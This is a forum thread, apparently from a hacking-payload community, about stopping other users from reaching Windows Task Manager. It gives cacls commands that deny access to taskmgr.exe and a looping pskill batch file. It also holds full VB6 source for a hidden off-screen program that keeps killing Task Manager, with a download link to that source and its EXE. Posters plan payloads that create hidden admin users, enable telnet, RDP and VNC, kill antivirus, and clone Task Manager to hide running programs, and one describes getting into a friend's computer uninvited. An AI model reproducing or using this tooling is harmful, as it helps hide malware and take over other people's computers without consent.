Jump to content

Disabling Ctrl+Alt+Del/Taskmgr


Recommended Posts

Posted

Has anyone thought of, or implemented a method to disable Ctrl alt del or taskmgr? I figured out an easy way to disable it and thought about trying to re-map the ctrl alt del keys to something else... just an idea

Posted

It can be done easily in the registry... If some one can be bothered looking up how to do it. Except this is a dead give away that some ones computer is infected.

Posted

True, but I didn't use the registry. That was the supposedly simplest way of disabling it, but the so called registry entries weren't even in my registry and I didn't try to create them. I used cacls to disable it from the current logged on user. Trying to figure out now how to disable it for only maybe 30 seconds or so.

Posted
rename taskmgr.exe

Like Explorer.exe, it will put a new copy out there(or at least it should) from dll cache files or backups. You have to logged on in safe mode, rename the file in dll cache(that it pulls a backup from) an dthen rename the file. I used this method to update a file so I can make my own themes that wouldn't run under the original uxtheme dll file.

All system files should automatically replace themself, and if they don't you can use somehting like system file checker to get it back.

http://en.wikipedia.org/wiki/System_File_Checker

Posted

Yea I've read about renaming and deleting the file and that it will create a backup upon next reboot or so. I'm just disabling it for about 30 seconds or so. I used:

cacls c:windowssystem32taskmgr.exe /D %COMPUTERNAME%%USERNAME%

which seems to work just fine for now. I just am trying to figure out how to re-enable it again but after 30 seconds exactly.

cacls c:windowssystem32taskmgr.exe /g %COMPUTERNAME%%USERNAME%:r

re-enables it to the current logged on user with read only access which is fine I just want that command to execute exactly 30 seconds after it has been disabled. The only way I can think of is to ping the localhost and try to do it for only 30 seconds somehow.

Posted

oh so basically you were just using fix.reg as an example? It's not a real file?

sleep.exe doesn't seem to do anything besides pause for a period of time which is exactly what I wanted, I did however create an anti-dote.

Posted

also in gpedit.msc

Posted
oh so basically you were just using fix.reg as an example? It's not a real file?

sleep.exe doesn't seem to do anything besides pause for a period of time which is exactly what I wanted, I did however create an anti-dote.

it doesn't....
Posted

I don't see why you would want to disable taskmanager... If the user actually tries to use it, and it doesn't work, they will immedeately know something's wrong.

Posted

Depends on the user...i know for one thing my parents would have no idea how to fix it and are too afraid to modify the registry for fear of breaking Windows.

It would be a great little addition you could add for those not-so-experienced Windows users. Renaming the executable would really mess with them too. Can't hurt to add it to the payload, like everything else, you can enable/disable it at your own liking. Personally I think it would be fun. Ya its kind of obvious, but that will just make them wonder who/how that got disabled. I love playing pranks with the hacksaw 8-) Friend of mine reinstalled Windows last week because I VNCed into his comp and started messing with him. He freaked. I'm gonna go disable Ctrl-Alt-Delete on him now...hes not techy enough to figure that one out. hehe...

Posted

Better would be a Task Manager clone that hides your progrms from showing up in it, or making a registry file that points to your version of a Taskmanager.exe on a thumb drive that hides your programs from being seen and then reverts back at the end of your payload to the original Taskmanager on exit. This way they can still use Task Manager to end certain programs but yours never show up in Taskmanager. If I remember correctly, there are some Taskmanager clones on PSC in VB6, so all you need to do is make the GUI look identical to the system your on and your pretty much golden. Make several variants to match the OS, like one for XP, 2000, Server 2003, etc.

They all look similar anyway so some people  might not even notice. And since it's not a virus, it shouldn't set off any alerts, although ZoneAlarm seems to ask to allow EVERY program to run if it is set up properly.

IIt will be defeated if someone checks msinfo32.exe because they can see running tasks in there as well. But then again, you could do the same thing here and make a clone that filters out your running payloads.

Posted

@ remkow,

Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.

@ digip,

I'm liking that idea alot :) actually I had something similar in mind that would be a 3 step process.

It would start out maybe just enabling telnet, rdp and creating a hidden admin user.

Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc.

Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.

Posted
@ remkow,

Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.

@ digip,

I'm liking that idea alot :) actually I had something similar in mind that would be a 3 step process.

It would start out maybe just enabling telnet, rdp and creating a hidden admin user.

Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc.

Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.

You will have to put hooks in there to check for getting taskmanager from other places to though. Like right clicking the taskbar or "start/run/taskmgr"

Posted

@ digip,

yea that's exactly why I said if taskmgr.exe is attempted to run at all that specific process then execute step 3, hooks are you referring to ( )? Sorry i'm still a newbie at batch  :?

Posted

My method is kind of ghetto, but it works well.  :smile:

make a batch file like this with pskill. Have it launched using nircmd with this command: nircmd execmd [batch file name]

:begin

pskill -t "TASKMGR.EXE"

:goto begin

Posted

Here is a little vb6 app that when run, hides it off screen and captures the delete key as well as mouse movements, so if they right click the taskbar to start taskmgr or use start/run or even windowskey+R to load a run box and manually run taskmgr, it kills taskmgr from running. Press F12 and it unloads the program, or add another timer and kill the vb6 program after so many minutes.

'End Taskmgr in Windows XP
'12/31/2007 - DigiP
'
'Following Line allows ShellExecute commands
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

'Mouse Detection Src Code: http://www.daniweb.com/forums/thread101100.html
Private Type POINTAPI
    X As Long
    Y As Long
End Type

Private Declare Function GetCursorPos Lib "User32" (lpPoint As POINTAPI) As Long


Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer)

On Error GoTo poo
If KeyCode = vbKeyDelete Then 'Because we only want to check if delete is pressed in combo with ctrl+alt+del
MakeNotTopMost (Me.hWnd)
ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
End If

MakeTopMost (Me.hWnd)

'Change this to whatever you want!
If KeyCode = vbKeyF12 Then Unload Me

Exit Sub


poo:
MakeTopMost (Me.hWnd)
Exit Sub

End Sub



Private Sub Timer1_Timer()
Dim Point As POINTAPI
Dim lngReturn As Long
Dim lngScreenX As Long
Dim lngScreenY As Long
lngReturn = GetCursorPos(Point)
lngScreenX = Point.X
lngScreenY = Point.Y
' Enter Code to whatever you want with the results
'
'Debug.Print "X-pos: " & lngScreenX & " , Y-pos: " & lngScreenY

On Error GoTo poo
MakeNotTopMost (Me.hWnd)
ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
MakeTopMost (Me.hWnd)
Exit Sub

poo:
MakeTopMost (Me.hWnd)
Exit Sub

End Sub

Create a form and add timer to it (Set the interval to like 2000 which is 2 seconds or 1000 for 1 second). Then resize the form to like 10x10 pixels and make its start up position off screen. Done.

Full source project download as well as working EXE file: http://www.twistedpairrecords.com/digip/ctrled.rar

And BTW, virus scanners do not detect it since it really isnt malicious code, just built in Windows functions. Will not work on anything older than xp since taskmgr is not a program on 98 or 95 and taskkill is an XP system program.

This can still be detected and defeted by opening cmd.exe and typing in tasklist to see whats running. Then killing it with:

taskkill /F /IM ctrled.exe

I leave it up to you if you also want to kill cmd.exe or command.com, but leave yourself a way to end it safely or it will run forever until you reboot.

Posted

@ digip,

Nice one. I'll have to play around with that. Hmmm... how bout not kill cmd, but really restrict it to limited usage... actually... I wonder if there is a app cmd-like that when a user runs cmd or command.com those commands are mapped to a custom "shell" a fake shell something that would not allow the user to run admin commands, but appear as normal shell... I got quite a few idea's in mind I would like to create something not so much as to do damage, but to really make a user think.

@ Sc0rpi0,

Yea I plan to use pskill to kill all existing av/spyware processes... or wouldn't it be better if instead of killing the process just stop the service temporarily ;)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...